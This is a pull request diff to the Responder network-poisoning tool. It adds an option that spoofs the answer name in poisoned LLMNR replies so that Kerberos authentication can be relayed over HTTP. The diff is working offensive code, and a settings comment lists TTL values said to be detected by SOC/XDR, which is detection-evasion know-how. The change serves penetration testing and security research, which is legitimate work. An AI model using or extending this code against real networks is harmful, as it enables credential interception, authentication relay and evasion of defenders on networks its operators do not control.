### PR TITLE
Adding answer name spoofing capabilities to LLMNR poisoner for Kerberos relaying purposes

### DIFF
--- a/README.md
+++ b/README.md
@@ -157,14 +157,23 @@ Options:
                         False
     -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                         authentication for the proxy. WPAD doesn't need to be
-                        ON. Default: False
+                        ON. This option is highly effective. Default: False
+    -Q, --quiet           Tell Responder to be quiet, disables a bunch of
+                        printing from the poisoners. Default: False
     --lm                  Force LM hashing downgrade for Windows XP/2003 and
                         earlier. Default: False
     --disable-ess         Force ESS downgrade. Default: False
     -v, --verbose         Increase verbosity.
+    -t 1e, --ttl=1e       Change the default Windows TTL for poisoned answers.
+                        Value in hex (30 seconds = 1e). use '-t random' for
+                        random TTL
+    -N ANSWERNAME, --AnswerName=ANSWERNAME
+                        Specifies the canonical name returned by the LLMNR
+                        poisoner in tits Answer section. By default, the
+                        answer's canonical name is the same as the query.
+                        Changing this value is mainly useful when attempting
+                        to perform Kebreros relaying over HTTP.
 
-
-	
 
 ## Donation ##
 

--- a/Responder.py
+++ b/Responder.py
@@ -46,6 +46,7 @@ parser.add_option('--lm',                  action="store_true", help="Force LM h
 parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 parser.add_option('-t','--ttl',            action="store",      help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
+parser.add_option('-N', '--AnswerName',	   action="store",      help="Specifies the canonical name returned by the LLMNR poisoner in tits Answer section. By default, the answer's canonical name is the same as the query. Changing this value is mainly useful when attempting to perform Kebreros relaying over HTTP.", dest="AnswerName", default=None)
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:

--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -58,6 +58,10 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 		try:
 			data, soc = self.request
 			Name = Parse_LLMNR_Name(data).decode("latin-1")
+			if settings.Config.AnswerName is None:
+				AnswerName = Name
+			else:
+				AnswerName = settings.Config.AnswerName
 			LLMNRType = Parse_IPV6_Addr(data)
 
 			# Break out if we don't want to respond to this host
@@ -78,14 +82,17 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 				elif LLMNRType == True:  # Poisoning Mode
 					#Default:
 					if settings.Config.TTL == None:
-						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
 					else:
-						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 					if not settings.Config.Quiet_Mode:
 						LineHeader = "[*] [LLMNR]"
-						print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
 					SavePoisonersToDb({
 							'Poisoner': 'LLMNR', 
 							'SentToIp': self.client_address[0], 
@@ -96,14 +103,17 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 				elif LLMNRType == 'IPv6' and Have_IPv6:
 					#Default:
 					if settings.Config.TTL == None:
-						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
 					else:
-						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 					if not settings.Config.Quiet_Mode:
 						LineHeader = "[*] [LLMNR]"
-						print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
 					SavePoisonersToDb({
 							'Poisoner': 'LLMNR6', 
 							'SentToIp': self.client_address[0], 

--- a/settings.py
+++ b/settings.py
@@ -172,6 +172,7 @@ class Settings:
 		self.DHCP_DNS           = options.DHCP_DNS
 		self.ExternalIP6        = options.ExternalIP6
 		self.Quiet_Mode			= options.Quiet
+		self.AnswerName			= options.AnswerName
 
 		# TTL blacklist. Known to be detected by SOC / XDR
 		TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]


### PR DESCRIPTION
The present pull requests adds the `-N` (`--AnswerName`) flag to Responder, which allows to spoof the answer name returned by LLMNR responses when poisoning a client. This is mainly useful when attempting to perform Kerberos relaying over HTTP.
More details on the motivation behind this pull request can be found in the following article (should be published on 27th january):
https://synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with
